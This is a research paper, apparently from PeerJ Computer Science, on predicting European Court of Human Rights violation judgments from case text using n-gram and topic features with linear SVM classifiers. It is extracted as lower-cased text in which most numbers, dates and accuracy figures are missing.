patterns which lead to certain decisions. this paper presents the first systematic study on predicting the outcome of cases tried by the european court of human rights based solely on textual content. we formulate a binary classification task where the input of our classifiers is the textual content extracted from a case and the target output is the actual judgment as to whether there has been a violation of an article of the convention of human rights. textual information is represented using contiguous word sequences, i.e., n-grams, and topics. our models can predict the court’s decisions with a strong accuracy ( % on average). our empirical analysis indicates that the formal facts of a case are the most important predictive factor. this is consistent with the theory of legal realism suggesting that judicial decision-making is significantly affected by the stimulus of the facts. we also observe that the topical content of a case is another important feature in this classification task and explore this relationship further by conducting a qualitative analysis. subjects artificial intelligence, computational linguistics, data mining and machine learning, data science, natural language and speech keywords natural language processing, text mining, legal science, machine learning, artificial intelligence, judicial decisions introduction in his prescient work on investigating the potential use of information technology in the legal domain, lawlor surmised that computers would one day become able to analyse and predict the outcomes of judicial decisions (lawlor, ). according to lawlor, reliable prediction of the activity of judges would depend on a scientific understanding of the ways that the law and the facts impact on the relevant decision-makers, i.e., the judges. more than fifty years later, the advances in natural language processing (nlp) and machine learning (ml) provide us with the tools to automatically analyse legal materials, so as to build successful predictive models of judicial outcomes. how to cite this article aletras etal ( ), predicting judicial decisions of the european court of human rights: a natural language processing perspective. peerj comput. sci. :e ; doi . /peerj-cs. an amicus curiae (friend of the court) is a person or organisation that offers testimony before the court in the context of a particular case without being a formal party to the proceedings. in this paper, our particular focus is on the automatic analysis of cases of the european court of human rights (ecthr or court). the ecthr is an international court that rules on individual or, much more rarely, state applications alleging violations by some state party of the civil and political rights set out in the european convention on human rights (echr or convention). our task is to predict whether a particular article of the convention has been violated, given textual evidence extracted from a case, which comprises of specific parts pertaining to the facts, the relevant applicable law and the arguments presented by the parties involved. our main hypotheses are that ( ) the textual content, and ( ) the different parts of a case are important factors that influence the outcome reached by the court. these hypotheses are corroborated by the results. our work lends some initial plausibility to a text-based approach with regard to ex ante prediction of ecthr outcomes on the assumption that the text extracted from published judgments of the court bears a sufficient number of similarities with, and can therefore stand as a (crude) proxy for, applications lodged with the court as well as for briefs submitted by parties in pending cases. we submit, though, that full acceptance of that reasonable assumption necessitates more empirical corroboration. be that as it may, our more general aim is to work under this assumption, thus placing our work within the larger context of ongoing empirical research in the theory of adjudication about the determinants of judicial decision-making. accordingly, in the discussion we highlight ways in which automatically predicting the outcomes of ecthr cases could potentially provide insights on whether judges follow a so-called legal model (grey, ) of decision making or their behavior conforms to the legal realists’ theorization (leiter, ), according to which judges primarily decide cases by responding to the stimulus of the facts of the case. we define the problem of the ecthr case prediction as a binary classification task. we utilise textual features, i.e., n-grams and topics, to train support vector machine (svm) classifiers (vapnik, ). we apply a linear kernel function that facilitates the interpretation of models in a straightforward manner. our models can reliably predict ecthr decisions with high accuracy, i.e., % on average. results indicate that the ‘facts’ section of a case best predicts the actual court’s decision, which is more consistent with legal realists’ insights about judicial decision-making. we also observe that the topical content of a case is an important indicator whether there is a violation of a given article of the convention or not. previous work on predicting judicial decisions, representing disciplinary backgrounds in political science and economics, has largely focused on the analysis and prediction of judges’ votes given non textual information, such as the nature and the gravity of the crime or the preferred policy position of each judge (kort, ; nagel, ; keown, ; segal, ; popple, ; lauderdale & clark, ). more recent research shows that information from texts authored by amici curiae improves models for predicting the votes of the us supreme court judges (sim, routledge & smith, ). also, a text mining approach utilises sources of metadata about judge’s votes to estimate the degree to which those votes are about common issues (lauderdale & clark, ). accordingly, this paper presents the first systematic study on predicting the decision outcome of cases tried at a major international court by mining the available textual information. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / echtr provisional annual report for the year : http://www.echr.coe.int/ documents/annual_report_ _eng. pdf. hudoc echr database: http://hudoc. echr.coe.int/. nonetheless, not all cases that pass this first admissibility stage are decided in the same way. while the individual judge’s decision on admissibility is final and does not comprise the obligation to provide reasons, a committee deciding a case may, by unanimous vote, declare the application admissible and render a judgment on its merits, if the legal issue raised by the application is covered by well-established case-law by the court. overall, we believe that building a text-based predictive system of judicial decisions can offer lawyers and judges a useful assisting tool. the system may be used to rapidly identify cases and extract patterns that correlate with certain outcomes. it can also be used to develop prior indicators for diagnosing potential violations of specific articles in lodged applications and eventually prioritise the decision process on cases where violation seems very likely. this may improve the significant delay imposed by the court and encourage more applications by individuals who may have been discouraged by the expected time delays. materials and methods european court of human rights the ecthr is an international court set up in by the echr. the court has jurisdiction to rule on the applications of individuals or sovereign states alleging violations of the civil and political rights set out in the convention. the echr is an international treaty for the protection of civil and political liberties in european democracies committed to the rule of law. the treaty was initially drafted in by the ten states which had created the council of europe in the previous year. membership in the council entails becoming party to the convention and all new members are expected to ratify the echr at the earliest opportunity. the convention itself entered into force in . since , the council of europe and thus the convention have expanded significantly to embrace forty-seven states in total, with a combined population of nearly million. since , the court has sat as a full-time court and individuals can apply to it directly, if they can argue that they have voiced their human rights grievance by exhausting all effective remedies available to them in their domestic legal systems before national courts. case processing by the court the vast majority of applications lodged with the court are made by individuals. applications are first assessed at a prejudicial stage on the basis of a list of admissibility criteria. the criteria pertain to a number of procedural rules, chief amongst which is the one on the exhaustion of effective domestic remedies. if the case passes this first stage, it can either be allocated to a single judge, who may declare the application inadmissible and strike it out of the court’s list of cases, or be allocated to a committee or a chamber. a large number of the applications, according to the court’s statistics fail this first admissibility stage. thus, to take a representative example, according to the court’s provisional annual report for the year , applications were declared inadmissible or struck out of the list by chambers, approximately , by committees and some , by single judges. to these correspond, for the same year, judgments on the merits. moreover, cases held inadmissible or struck out are not reported, which entails that a text-based predictive analysis of them is impossible. it is important to keep this point in mind, since our analysis was solely performed on cases retrievable through the electronic database of the court, hudoc. the cases analysed are thus the ones that have already passed the first admissibility stage, with the consequence that the court decided on these cases’ merits under one of its formations. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / rules of ecthr, http://www.echr.coe.int/ documents/rules_court_eng.pdf. main premise our main premise is that published judgments can be used to test the possibility of a text-based analysis for ex ante predictions of outcomes on the assumption that there is enough similarity between (at least) certain chunks of the text of published judgments and applications lodged with the court and/or briefs submitted by parties with respect to pending cases. predictive tasks were based on the text of published judgments rather than lodged applications or briefs simply because we did not have access to the relevant data set. we thus used published judgments as proxies for the material to which we do not have access. this point should be borne in mind when approaching our results. at the very least, our work can be read in the following hypothetical way: if there is enough similarity between the chunks of text of published judgments that we analyzed and that of lodged applications and briefs, then our approach can be fruitfully used to predict outcomes with these other kinds of texts. case structure the judgments of the court have a distinctive structure, which makes them particularly suitable for a text-based analysis. according to rule of the rules of the court, a judgment contains (among other things) an account of the procedure followed on the national level, the facts of the case, a summary of the submissions of the parties, which comprise their main legal arguments, the reasons in point of law articulated by the court and the operative provisions. judgments are clearly divided into different sections covering these contents, which allows straightforward standardisation of the text and consequently renders possible text-based analysis. more specifically, the sections analysed in this paper are the following: • procedure: this section contains the procedure followed before the court, from the lodging of the individual application until the judgment was handed down. • the facts: this section comprises all material which is not considered as belonging to points of law, i.e., legal arguments. it is important to stress that the facts in the above sense do not just refer to actions and events that happened in the past as these have been formulated by the court, giving rise to an alleged violation of a convention article. the ‘facts’ section is divided in the following subsections: – the circumstances of the case: this subsection has to do with the factual background of the case and the procedure (typically) followed before domestic courts before the application was lodged by the court. this is the part that contains materials relevant to the individual applicant’s story in its dealings with the respondent state’s authorities. it comprises a recounting of all actions and events that have allegedly given rise to a violation of the echr. with respect to this subsection, a number of crucial clarifications and caveats should be stressed. to begin with, the text of the ‘circumstances’ subsection has been formulated by the court itself. as a result, it should not always be understood as a neutral mirroring of the factual background of the case. the choices made by the court when it comes to formulations of the facts incorporate implicit or explicit judgments to the effect that some facts are more aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / relevant than others. this leaves open the possibility that the formulations used by the court may be tailor-made to fit a specific preferred outcome. we openly acknowledge this possibility, but we believe that there are several ways in which it is mitigated. first, the ecthr has limited fact-finding powers and, in the vast majority of cases, it defers, when summarizing the factual background of a case, to the judgments of domestic courts that have already heard and dismissed the applicants’ echr-related complaint (leach, paraskeva & uelac, ; leach, ). while domestic courts do not necessarily hear complaints on the same legal issues as the ecthr does, by virtue of the incorporation of the convention by all states parties (helfer, ), they typically have powers to issue judgments on echr-related issues. domestic judgments may also reflect assumptions about the relevance of various events, but they also provide formulations of the facts that have been validated by more than one decision-maker. second, the court cannot openly acknowledge any kind of bias on its part. this means that, on their face, summaries of facts found in the ‘circumstances’ section have to be at least framed in as neutral and impartial a way as possible. as a result, for example, clear displays of impartiality, such as failing to mention certain crucial events, seem rather improbable. third, a cursory examination of many ecthr cases indicates that, in the vast majority of cases, parties do not seem to dispute the facts themselves, as contained in the ‘circumstances’ subsection, but only their legal significance (i.e., whether a violation took place or not, given those facts). as a result, the ‘circumstances’ subsection contains formulations on which, in the vast majority of cases, disputing parties agree. last, we hasten to add that the above three kinds of considerations do not logically entail that other forms of non-outright or indirect bias in the formulation of facts are impossible. however, they suggest that, in the absence of access to other kinds of textual data, such as lodged applications and briefs, the ‘circumstances’ subsection can reasonably perform the function of a (sometimes crude) proxy for a textual representation of the factual background of a case. – relevant law: this subsection of the judgment contains all legal provisions other than the articles of the convention that can be relevant to deciding the case. these are mostly provisions of domestic law, but the court also frequently invokes other pertinent international or european treaties and materials. • the law: the law section considers the merits of the case, through the use of legal argument. depending on the number of issues raised by each application, the section is further divided into subsections that examine individually each alleged violation of some convention article (see below). however, the court in most cases refrains from examining all such alleged violations in detail. insofar as the same claims can be made by invoking more than one article of the convention, the court frequently decides only those that are central to the arguments made. moreover, the court frequently refrains from deciding on an alleged violation of an article, if it overlaps sufficiently with some other violation it has already decided on. – alleged violation of article x: each subsection of the judgment examining alleged violations in depth is divided into two sub-sections. the first one contains the parties’ aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / the data set is publicly available for download from https://figshare.com/s/ f d e c ff . figure procedure. this section contains the procedure followed before the court, from the lodging of the individual application until the judgment was handed down. submissions. the second one comprises the arguments made by the court itself on the merits. ∗ parties’ submissions: the parties’ submissions typically summarise the main arguments made by the applicant and the respondent state. since in the vast majority of cases the material facts are taken for granted, having been authoritatively established by domestic courts, this part has almost exclusively to do with the legal arguments used by the parties. ∗ merits: this subsection provides the legal reasons that purport to justify the specific outcome reached by the court. typically, the court places its reasoning within a wider set of rules, principles and doctrines that have already been established in its past case-law and attempts to ground the decision by reference to these. it is to be expected, then, that this subsection refers almost exclusively to legal arguments, sometimes mingled with bits of factual information repeated from previous parts. • operative provisions: this is the section where the court announces the outcome of the case, which is a decision to the effect that a violation of some convention article either did or did not take place. sometimes it is coupled with a decision on the division of legal costs and, much more rarely, with an indication of interim measures, under article of the echr. figures – , show extracts of different sections from the case of ‘‘velcheva v. bulgaria’’ (http://hudoc.echr.coe.int/sites/eng/pages/search.aspx?i= - ) following the structure described above. data we create a data set consisting of cases related to articles , , and of the convention. we focus on these three articles for two main reasons. first, these articles provided the most data we could automatically scrape. second, it is of crucial importance that there should be a sufficient number of cases available, in order to test the models. cases from the selected articles fulfilled both criteria. table shows the convention right that each article protects and the number of cases in our data set. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / figure the facts. this section comprises all material which is not considered as belonging to points of law, i.e., legal arguments. figure the law. the law section is focused on considering the merits of the case, through the use of le- gal argument. figure operative provisions. this is the section where the court announces the outcome of the case, which is a decision to the effect that a violation of some convention article either did or did not take place. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / table articles of the convention and number of cases in the data set. article numbers, convention right that each article protects and the number of cases in our data set. article human right cases prohibits torture and inhuman and degrading treatment protects the right to a fair trial provides a right to respect for one’s ‘‘private and family life, his home and his correspondence’’ for each article, we first retrieve all the cases available in hudoc. then, we keep only those that are in english and parse them following the case structure presented above. we then select an equal number of violation and non-violation cases for each particular article of the convention. to achieve a balanced number of violation/non-violation cases, we first count the number of cases available in each class. then, we choose all the cases in the smaller class and randomly select an equal number of cases from the larger class. this results to a total of , and cases for articles , and , respectively. finally, we extract the text under each part of the case by using regular expressions, making sure that any sections on operative provisions of the court are excluded. in this way, we ensure that the models do not use information pertaining to the outcome of the case. we also preprocess the text by lower-casing and removing stop words (i.e., frequent words that do not carry significant semantic information) using the list provided by nltk (https://raw.githubusercontent.com/nltk/nltk_data/ghpages/packages/corpora/ stopwords.zip). description of textual features we derive textual features from the text extracted from each section (or subsection) of each case. these are either n-gram features, i.e., contiguous word sequences, or word clusters, i.e., abstract semantic topics. • n-gram features: the bag-of-words (bow) model (salton, wong & yang, ; salton & mcgill, ) is a popular semantic representation of text used in nlp and information retrieval. in a bow model, a document (or any text) is represented as the bag (multiset) of its words (unigrams) or n-grams without taking into account grammar, syntax and word order. that results to a vector space representation where documents are represented as m-dimensional variables over a set of m n-grams. n-gram features have been shown to be effective in various supervised learning tasks (bamman, eisenstein & schnoebelen, ; lampos & cristianini, ). for each set of cases in our data set, we compute the top- most frequent n-grams where n ∈ { , , , }. each feature represents the normalized frequency of a particular n-gram in a case or a section of a case. this can be considered as a feature matrix, c ∈ rc×m, where c is the number of the cases and m = , . we extract n-gram features for the procedure (procedure), circumstances (circumstances), facts (facts), relevant law (relevant law), law (law) and the full case (full) respectively. note that the representations of the facts is obtained by taking the mean vector of circumstances and relevant law. in a similar aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / way, the representation of the full case is computed by taking the mean vector of all of its sub-parts. • topics: we create topics for each article by clustering together n-grams that are semantically similar by leveraging the distributional hypothesis suggesting that similar words appear in similar contexts. we thus use the c feature matrix (see above), which is a distributional representation (turney & pantel, ) of the n-grams given the case as the context; each column vector of the matrix represents an n-gram. using this vector representation of words, we compute n-gram similarity using the cosine metric and create an n-gram by n-gram similarity matrix. we finally apply spectral clustering (von luxburg, )—which performs graph partitioning on the similarity matrix—to obtain clusters of n-grams. for articles and , we use the article data for selecting the number of clusters t , where t = { , ,..., }, while for article we use article . given that the obtained topics are hard clusters, an n-gram can only be part of a single topic. a representation of a cluster is derived by looking at the most frequent n-grams it contains. the main advantages of using topics (sets of n-grams) instead of single n-grams is that it reduces the dimensionality of the feature space, which is essential for feature selection, it limits overfitting to training data (lampos et al., ; preoţiuc-pietro, lampos & aletras, ; preoţiuc-pietro et al., ) and also provides a more concise semantic representation. classification model the problem of predicting the decisions of the ecthr is defined as a binary classification task. our goal is to predict if, in the context of a particular case, there is a violation or non-violation in relation to a specific article of the convention. for that purpose, we use each set of textual features, i.e., n-grams and topics, to train support vector machine (svm) classifiers (vapnik, ). an svm is a machine learning algorithm that has shown particularly good results in text classification, especially using small data sets (joachims, ; wang & manning, ). we employ a linear kernel since that allows us to identify important features that are indicative of each class by looking at the weight learned for each feature (chang & lin, ). we label all the violation cases as + , while no violation is denoted by − . therefore, features assigned with positive weights are more indicative of violation, while features with negative weights are more indicative of no violation. the models are trained and tested by applying a stratified -fold cross validation, which uses a held-out % of the data at each stage to measure predictive performance. the linear svm has a regularisation parameter of the error term c, which is tuned using grid-search. for articles and , we use the article data for parameter tuning, while for article we use article . results and discussion predictive accuracy we compute the predictive performance of both sets of features on the classification of the ecthr cases. performance is computed as the mean accuracy obtained by -fold aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / table accuracy of the different feature types across articles. accuracy of predicting violation/non- violation of cases across articles on -fold cross-validation using an svm with linear kernel. parentheses contain the standard deviation from the mean. accuracy of random guess is . . bold font denotes best accuracy in a particular article or on average across articles. feature type article article article average n-grams full . (. ) . (. ) . (. ) . procedure . (. ) . (. ) . (. ) . circumstances . (. ) . (. ) . (. ) . relevant law . (. ) . (. ) . (. ) . facts . (. ) . (. ) . (. ) . law . (. ) . (. ) . (. ) . topics . (. ) . (. ) . (. ) . topics and circumstances . (. ) . ( . ) . ( . ) . cross-validation. accuracy is computed as follows: accuracy = tv +tnv v +nv ( ) where tv and tnv are the number of cases correctly classified that there is a violation an article of the convention or not respectively. v and nv represent the total number of cases where there is a violation or not respectively. table shows the accuracy of each set of features across articles using a linear svm. the rightmost column also shows the mean accuracy across the three articles. in general, both n-gram and topic features achieve good predictive performance. our main observation is that both language use and topicality are important factors that appear to stand as reliable proxies of judicial decisions. therefore, we take a further look into the models by attempting to interpret the differences in accuracy. we observe that ‘circumstances’ is the best subsection to predict the decisions for cases in articles and , with a performance of . and . respectively. in article , we obtain better predictive accuracy (. ) using the text extracted from the full case (‘full’) while the performance of ‘circumstances’ is almost comparable (. ). we should again note here that the ‘circumstances’ subsection contains information regarding the factual background of the case, as this has been formulated by the court. the subsection therefore refers to the actions and events which triggered the case and gave rise to a claim made by an individual to the effect that the echr was violated by some state. on the other hand, ‘full’, which is a mixture of information contained in all of the sections of a case, surprisingly fails to improve over using only the ‘circumstances’ subsection. this entails that the factual background contained in the ‘circumstances’ is the most important textual part of the case when it comes to predicting the court’s decision. the other sections and subsections that refer to the facts of a case, namely ‘procedure,’ ‘relevant law’ and ‘facts’ achieve somewhat lower performance (. cf. . ), although they remain consistently above chance. recall, at this point, that the ‘procedure’ subsection consists only of general details about the applicant, such as the applicant’s name or country of origin and the procedure followed before domestic courts. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / on the other hand, the ‘law’ subsection, which refers either to the legal arguments used by the parties or to the legal reasons provided by the court itself on the merits of a case consistently obtains the lowest performance (. ). one important reason for this poor performance is that a large number of cases does not include a ‘law’ subsection, i.e., , and for articles , and respectively. that happens in cases that the court deems inadmissible, concluding to a judgment of non-violation. we also observe that the predictive accuracy is high for all the articles when using the ‘topics’ as features, i.e., . , . and . for articles , and respectively. ‘topics’ obtain the best performance in article and performance comparable to ‘circumstances’ in articles and . ‘topics’ form a more abstract way of representing the information contained in each case and capture a more general gist of the cases. combining the two best performing sets of features (‘circumstances’ and ‘topics’) we achieve the best average classification performance (. ). the combination also yields slightly better performance for articles and while performance marginally drops for article . that is . , . and . for articles , and respectively. discussion the consistently more robust predictive accuracy of the ‘circumstances’ subsection suggests a strong correlation between the facts of a case, as these are formulated by the court in this subsection, and the decisions made by judges. the relatively lower predictive accuracy of the ‘law’ subsection could also be an indicator of the fact that legal reasons and arguments of a case have a weaker correlation with decisions made by the court. however, this last remark should be seriously mitigated since, as we have already observed, many inadmissibility cases do not contain a separate ‘law’ subsection. legal formalism and realism these results could be understood as providing some evidence for judicial decision-making approaches according to which judges are primarily responsive to non-legal, rather than to legal, reasons when they decide appellate cases. without going into details with respect to a particularly complicated debate that is out of the scope of this paper, we may here simplify by observing that since the beginning of the th century, there has been a major contention between two opposing ways of making sense of judicial decision-making: legal formalism and legal realism (posner, ; tamanaha, ; leiter, ). very roughly, legal formalists have provided a legal model of judicial decision-making, claiming that the law is rationally determinate: judges either decide cases deductively, by subsuming facts under formal legal rules or use more complex legal reasoning than deduction whenever legal rules are insufficient to warrant a particular outcome (pound, ; kennedy, ; grey, ; pildes, ). on the other hand, legal realists have criticized formalist models, insisting that judges primarily decide appellate cases by responding to the stimulus of the facts of the case, rather than on the basis of legal rules or doctrine, which are in many occasions rationally indeterminate (llewellyn, ; schauer, ; baum, ; leiter, ; miles & sunstein, ). extensive empirical research on the decision-making processes of various supreme and international courts, and especially the us supreme court, has indicated rather consistently aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / that pure legal models, especially deductive ones, are false as an empirical matter when it comes to cases decided by courts further up the hierarchy. as a result, it is suggested that the best way to explain past decisions of such courts and to predict future ones is by placing emphasis on other kinds of empirical variables that affect judges (baum, ; schauer, ). for example, early legal realists had attempted to classify cases in terms of regularities that can help predict outcomes, in a way that did not reflect standard legal doctrine (llewellyn, ). likewise, the attitudinal model for the us supreme court claims that the best predictors of its decisions are the policy preferences of the justices and not legal doctrinal arguments (segal & spaeth, ). in general, and notwithstanding the simplified snapshot of a very complex debate that we just presented, our results could be understood as lending some support to the basic legal realist intuition according to which judges are primarily responsive to non-legal, rather than to legal, reasons when they decide hard cases. in particular, if we accept that the ‘circumstances’ subsection, with all the caveats we have already voiced, is a (crude) proxy for non-legal facts and the ‘law’ subsection is a (crude) proxy for legal reasons and arguments, the predictive superiority of the ‘circumstances’ subsection seems to cohere with extant legal realist treatments of judicial decision-making. however, not more should be read into this than our results allow. first, as we have already stressed at several occasions, the ‘circumstances’ subsection is not a neutral statement of the facts of the case and we have only assumed the similarity of that subsection with analogous sections found in lodged applications and briefs. second, it is important to underline that the results should also take into account the so-called selection effect (priest & klein, ) that pertains to cases judged by the ecthr as an international court. given that the largest percentage of applications never reaches the chamber or, still less, the grand chamber, and that cases have already been tried at the national level, it could very well be the case that the set of ecthr decisions on the merits primarily refers to cases in which the class of legal reasons, defined in a formal sense, is already considered as indeterminate by competent interpreters. this could help explain why judges primarily react to the facts of the case, rather than to legal arguments. thus, further text-based analysis is needed in order to determine whether the results could generalise to other courts, especially to domestic courts deciding echr claims that are placed lower within the domestic judicial hierarchy. third, our discussion of the realism/formalism debate is overtly simplified and does not imply that the results could not be interpreted in a sophisticated formalist way. still, our work coheres well with a bulk of other empirical approaches in the legal realist vein. topic analysis the topics further exemplify this line of interpretation and provide proof of the usefulness of the nlp approach. the linear kernel of the svm model can be used to examine which topics are most important for inferring whether an article of the convention has been violated or not by looking at their weights w. tables – present the six topics for the most positive and negative svm weights for the articles , and , respectively. topics identify in a sufficiently robust manner patterns of fact scenarios that correspond to well-established trends in the court’s case law. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / note that all the cases used as examples in this section are taken from the data set we used to perform the experiments. table the most predictive topics for article decisions. most predictive topics for article , represented by the most frequent words, listed in order of their svm weight. topic labels are manually added. positive weights (w) denote more predictive topics for violation and negative weights for no violation. topic label words w top- violation positive state obligations injury, protection, ordered, damage, civil, caused, failed, claim, course, connection, region, effective, quashed, claimed, suffered, suspended, carry, compensation, pecuniary, ukraine . detention conditions prison, detainee, visit, well, regard, cpt, access, food, situation, problem, remained, living, support, visited, establishment, standard, admissibility merit, overcrowding, contact, good . treatment by state officials police, officer, treatment, police officer, july, ill, force, evidence, ill treatment, arrest, allegation, police station, subjected, arrested, brought, subsequently, allegedly, ten, treated, beaten . top- no violation prior violation of article june, statement, three, dated, car, area, jurisdiction, gendarmerie, perpetrator, scene, june applicant, killing, prepared, bullet, wall, weapon, kidnapping, dated june, report dated, stopped − . issues of proof witness, asked, told, incident, brother, heard, submission, arrived, identity, hand, killed, called, involved, started, entered, find, policeman, returned, father, explained − . sentencing sentence, year, life, circumstance, imprisonment, release, set, president, administration, sentenced, term, constitutional, federal, appealed, twenty, convicted, continued, regime, subject, responsible − . first, topic in table has to do with whether long prison sentences and other detention measures can amount to inhuman and degrading treatment under article . that is correctly identified as typically not giving rise to a violation (european court of human rights, ). for example, cases such as kafkaris v. cyprus ([gc] no. / , echr -i), hutchinson v. uk (no. / of february ) and enea v. italy ([gc], no. / , echr -iv) were identified as exemplifications of this trend. likewise, topic in table has to do with whether certain choices with regard to the social policy of states can amount to a violation of article . that was correctly identified as typically not giving rise to a violation, in line with the court’s tendency to acknowledge a large margin of appreciation to states in this area (greer, ). in this vein, cases such as aune v. norway (no. / of october ) and ball v. andorra (application no. / of december ) are examples of cases where topic is dominant. similar observations apply, among other things, to topics , and . that includes issues with the enforcement of domestic judgments giving rise to a violation of article (kiestra, ). some representative cases are velskaya v. russia, of october and aleksandrova v. russia of december . topic in table is related to lower standard of review when property rights are at play (tsarapatsanis, ). a representative aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / table the most predictive topics for article decisions. most predictive topics for article , represented by the most frequent words, listed in order of their svm weight. topic labels are manually added. positive weights (w) denote more predictive topics for violation and negative weights for no violation. topic label words w top- violation enforcement of domestic judgments and reasonable time appeal, enforcement, damage, instance, dismissed, established, brought, enforcement proceeding, execution, limit, court appeal, instance court, caused, time limit, individual, responsible, receipt, court decision, copy, employee . enforcement of domestic judgments and reasonable time court, applicant, article, judgment, case, law, proceeding, application, government, convention, time, article convention, january, human, lodged, domestic, february, september, relevant, represented . enforcement of domestic judgments and reasonable time party, final, respect, set, interest, alleged, general, violation, entitled, complained, obligation, read, fair, final judgment, violation article, served, applicant complained, summons, convention article, fine . top- no violation criminal limb defendant, detention, witness, cell, counsel, condition, defence, court upheld, charged, serious, regional court upheld, pre, remand, inmate, pre trial, extended, detained, temporary, defence counsel, metre − . criminal limb procedure, judge, fact, federal, justice, reason, charge, point, criminal procedure, code criminal, code criminal procedure, result, pursuant, article code, lay, procedural, point law, indictment, lay judge, argued, appeal point law − . property rights and claims by companies compensation, company, property, examined, cassation, rejected, declared, owner, deputy, tula, returned, duly, enterprise, moscow, foreign, appears, control, violated, absence, transferred − . case here is oao plodovaya kompaniya v. russia of june . consequently, the topics identify independently well-established trends in the case law without recourse to expert legal/doctrinal analysis. the above observations require to be understood in a more mitigated way with respect to a (small) number of topics. for instance, most representative cases for topic in table were not particularly informative. this is because these were cases involving a person’s death, in which claims of violations of article (inhuman and degrading treatment) were only subsidiary: this means that the claims were mainly about article , which protects the right to life. in these cases, the absence of a violation, even if correctly identified, is more of a technical issue on the part of the court, which concentrates its attention on article and rarely, if ever, moves on to consider independently a violation of article . this is exemplified by cases such as buldan v. turkey of april and nuray Şen v. turkey of march , which were, again, correctly identified. on the other hand, cases have been misclassified mainly because their textual information is similar to cases in the opposite class. we observed a number of cases where there is a aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / table the most predictive topics for article decisions. most predictive topics for article , represented by the most frequent words, listed in order of their svm weight. topic labels are manually added. positive weights (w) denote more predictive topics for violation and negative weights for no violation. topic label words w top- violation death and military action son, body, result, russian, department, prosecutor office, death, group, relative, head, described, military, criminal investigation, burial, district prosecutor, men, deceased, town, attack, died . unlawful limitation clauses health moral, law democratic, law democratic society, disorder crime, prevention disorder, prevention disorder crime, economic well, protection health, interest national, interest national security, public authority exercise, interference public authority exercise, national security public, exercise law democratic, public authority exercise law, authority exercise law democratic, exercise law, authority exercise law, exercise law democratic society, crime protection . judicial procedure second, instance, second applicant, victim, municipal, violence, authorised, address, municipal court, relevant provision, behaviour, register, appear, maintenance, instance court, defence, procedural, decide, court decided, quashed . top- no violation discretion of state authorities service, obligation, data, duty, review, high, system, test, concern, building, agreed, professional, positive, threat, carry, van, accepted, step, clear, panel − . social policy contact, social, care, expert, opinion, living, welfare, county, physical, psychological, agreement, divorce, restriction, support, live, dismissed applicant, prior, remained, court considered, expressed − . migration cases national, year, country, residence, minister, permit, requirement, netherlands, alien, board, claimed, stay, contrary, objection, spouse, residence permit, close, deputy, deportation, brother − . violation having a very similar feature vector to cases that there is no violation and vice versa. conclusions we presented the first systematic study on predicting judicial decisions of the european court of human rights using only the textual information extracted from relevant sections of ecthr judgments. we framed this task as a binary classification problem, where the training data consists of textual features extracted from given cases and the output is the actual decision made by the judges. apart from the strong predictive performance that our statistical nlp framework achieved, we have reported on a number of qualitative patterns that could potentially drive judicial decisions. more specifically, we observed that the information regarding the aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / factual background of the case as this is formulated by the court in the relevant subsection of its judgments is the most important part obtaining on average the strongest predictive performance of the court’s decision outcome. we suggested that, even if understood only as a crude proxy and with all the caveats that we have highlighted, the rather robust correlation between the outcomes of cases and the text corresponding to fact patterns contained in the relevant subsections coheres well with other empirical work on judicial decision-making in hard cases and backs basic legal realist intuitions. finally, we believe that our study opens up avenues for future work, using different kinds of data (e.g., texts of individual applications, briefs submitted by parties or domestic judgments) coming from various sources (e.g., the european court of human rights, national authorities, law firms). however, data access issues pose a significant barrier for scientists to work on such kinds of legal data. large repositories like hudoc, which are easily and freely accessible, are only case law databases. access to other kinds of data, especially lodged applications and briefs, would enable further research in the intersection of legal science and artificial intelligence. additional information and declarations funding dpp received funding from templeton religion trust (https://www.templeton.org) grant number: trt- . vl received funding from engineering and physical sciences research council (http://www.epsrc.ac.uk) grant number: ep/k / . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: templeton religion trust: trt- . engineering and physical sciences research council: ep/k / . competing interests nikolaos aletras is an employee of amazon.com, cambridge, uk, but work was completed while at university college london. author contributions • nikolaos aletras and vasileios lampos conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • dimitrios tsarapatsanis conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / • daniel preoţiuc-pietro conceived and designed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: echr dataset: https://figshare.com/s/ f d e c ff . references bamman d, eisenstein j, schnoebelen t. . gender identity and lexical variation in social media. journal of sociolinguistics ( ): – doi . /josl. . baum l. . the puzzle of judicial behavior. university of michigan press. chang y-w, lin c-j. . feature ranking using linear svm. in: wcci causation and prediction challenge, – . european court of human rights. . factsheet on life imprisonment. strasbourg: european court of human rights. available at http://www.echr.coe.int/documents/ fs_life_sentences_eng.pdf . greer sc. . the margin of appreciation: interpretation and discretion under the european convention on human rights, vol. . council of europe. grey tc. . langdell’s orthodoxy. university of pittsburgh law review : – . helfer lr. . redesigning the european court of human rights: embeddedness as a deep structural principle of the european human rights regime. european journal of international law ( ): – doi . /ejil/chn . joachims t. . learning to classify text using support vector machines: methods, theory and algorithms. kluwer academic publishers. kennedy d. . legal formality. the journal of legal studies ( ): – doi . / . keown r. . mathematical models for legal prediction. computer/lj : . kiestra lr. . the impact of the european convention on human rights on private international law. springer. kort f. . predicting supreme court decisions mathematically: a quantitative analysis of the ‘‘right to counsel’’ cases. american political science review ( ): – doi . / . lampos v, aletras n, preoţiuc-pietro d, cohn t. . predicting and characterising user impact on twitter. in: proceedings of the th conference of the european chapter of the association for computational linguistics, – . lampos v, cristianini n. . nowcasting events from the social web with statistical learning. acm transactions on intelligent systems and technology ( ): : – : . lauderdale be, clark 